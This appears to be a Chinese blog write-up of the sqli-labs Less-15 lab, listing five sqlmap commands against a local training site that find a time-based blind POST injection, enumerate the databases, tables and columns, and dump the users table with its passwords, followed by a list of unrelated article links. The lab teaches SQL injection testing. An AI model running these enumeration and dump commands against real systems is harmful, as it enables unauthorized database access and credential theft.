sqli-labs-Less-15自动化注入方法

sqli-labs 实验记录

Less-15

第一步:进行sqli注入漏洞检测

输入命令:

复制代码
sqlmap -u http://localhost/Less-15/?id=1 --batch --forms

--batch 表示采用默认参数。
--forms 表示自动提交表单。

查询结果如图所示:存在注入点uname,注入方式为POST,注入类型为:time-based blind; 并给出了相应的payload。

第二步:查询服务器中的所有数据库

输入命令:

复制代码
sqlmap -u http://localhost/Less-15/?id=1 --batch --forms --dbs

--dbs 表示查询数据库。

查询结果如图所示:数据库共有两个,分别为information_schema, security。

第三步:查询指定数据库中的所有表

输入命令:

复制代码
sqlmap -u http://localhost/Less-15/?id=1 --batch --forms -D security --tables

-D security 表示指定查询数据库security;
--tables 表示查询数据库中的所有表。

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的所有列

输入命令:

复制代码
sqlmap -u http://localhost/Less-15/?id=1 --batch --forms -D security -T users --columns

-T users 表示指定查询数据表users;
--columns 表示查询数据表中的所有列。

查询结果如图所示:数据列共有3个,分别是id, password, username。

第五步:查询指定数据表中的具体信息

输入命令:

复制代码
sqlmap -u http://localhost/Less-15/?id=1 --batch --forms -D security -T users --dump

--dump 表示查询数据表中的具体信息

查询结果如图所示:数据表users中的具体信息共有13条。

相关推荐
曦尧3 分钟前
Tolaria:为 AI 时代重新设计的 Files-first / Git-first 本地知识库
ai·自动化
wuqingshun31415917 分钟前
MYSQL默认的事务隔离级别是什么?为什么选择这个级别?
数据库·mysql
这个DBA有点耶3 小时前
导个数据中文全变问号?字符集这事儿真没那么简单
数据库·mysql·代码规范
wuqingshun3141594 小时前
MYSQL中如果发生死锁应该如何解决?
数据库·mysql
数据知道4 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
智慧物业老杨5 小时前
物业单盘精细化预算数智化方案:IoT采集+AI建模全链路自动化落地体系
人工智能·物联网·自动化
是上好佳佳佳呀5 小时前
MySQL 基础:从数据库概念到表结构管理DDL
数据库·mysql
BerryS3N5 小时前
Cursor+GitOps:AI驱动的自动化运维新范式
运维·人工智能·自动化
Sagittarius_A*5 小时前
Web 渗透实战:服务器系统识别、端口与中间件全量探测
服务器·网络安全·中间件·渗透测试
学逆向的6 小时前
汇编——函数
开发语言·汇编·网络安全